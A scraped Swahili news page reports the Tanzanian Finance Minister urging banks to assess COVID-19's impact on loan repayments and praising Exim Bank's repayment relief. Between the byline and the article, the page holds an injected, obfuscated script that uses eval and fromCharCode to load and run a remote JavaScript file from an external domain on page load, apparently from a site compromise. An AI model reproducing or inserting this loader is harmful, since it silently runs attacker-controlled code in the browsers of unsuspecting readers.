Recent Comments

SERIKALI YAAGIZA TAASISI ZA FEDHA KUTATHMINI ATHARI ZA CORONA KWA WATEJA WAO

By ObyMack David Jun 14, 2020
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Serikali imeagiza benki na taasisi za fedha kutathmini kwa kina athari zinazotokana na mlipuko wa COVID-19 kwenye urejeshaji wa mikopo ya wateja wa taasisi hizo huku ikipongeza benki ya Exim Tanzania kwa kuongeza muda wa urejeshaji wa mikopo ili kusaidia wateja wa benki hiyo ambao biashara zao zimeathiriwa zaidi na janga hilo.

Akiwasilisha bungeni mapendekezo ya serikali kuhusu makadirio ya mapato na matumizi kwa mwaka 2020/21 jijini Dodoma hivi karibuni , Waziri wa Fedha na Mipango, Dkt. Philip Mpango mbali na kuipongeza benki hiyo alitoa wito kwa benki nyingine nchini kujadiliana na kukubaliana na wakopaji namna ya kurejesha mikopo na kutoa unafuu wa urejeshaji wa mikopo. “Serikali kupitia Benki Kuu itatoa unafuu kwa benki na taasisi za fedha zitakazotoa unafuu katika urejeshwaji wa mikopo hiyo kwa kuzingatia uwazi na bila upendeleo. Katika hili, napenda kuzipongeza baadhi ya benki kama Exim ambazo tayari zimetangaza kuongeza muda wa urejeshaji wa mikopo ili kusaidia wateja wao katika sekta ambazo biashara zao zimeathiriwa na COVID-19 na naziomba benki nyingine zifuate mfano huo,’’ alisema

Katika kukabiliana na athari za janga hilo serikali ilichukua hatua kadhaa ili kunusuru uchumi ikiwemo kushusha kiwango cha riba kinachotozwa kwa benki kukopa Benki Kuu (discount rate) kutoka asilimia 7 hadi asilimia 5 hatua ambayo ililenga kuongeza wigo wa benki kukopa kutoka Benki Kuu kwa riba nafuu ili nazo ziwezi kupunguza riba ya mikopo kwa wateja.

Kauli hiyo ya Waziri Mpango imekuja siku chache kufuatia Benki ya Exim kutangaza msamaha wa likizo ya malipo ya mikopo wenye thamani ya zaidi ya shilingi bilioni 160 ulianza mwezi Juni mwaka huu, kwa wateja wake wakubwa, wa kati na wadogo walipo katika sekta zilizo athirika zaidi kiuchumi kutokana na athari za mlipuko wa ugonjwa wa virus vya Corona (COVID 19).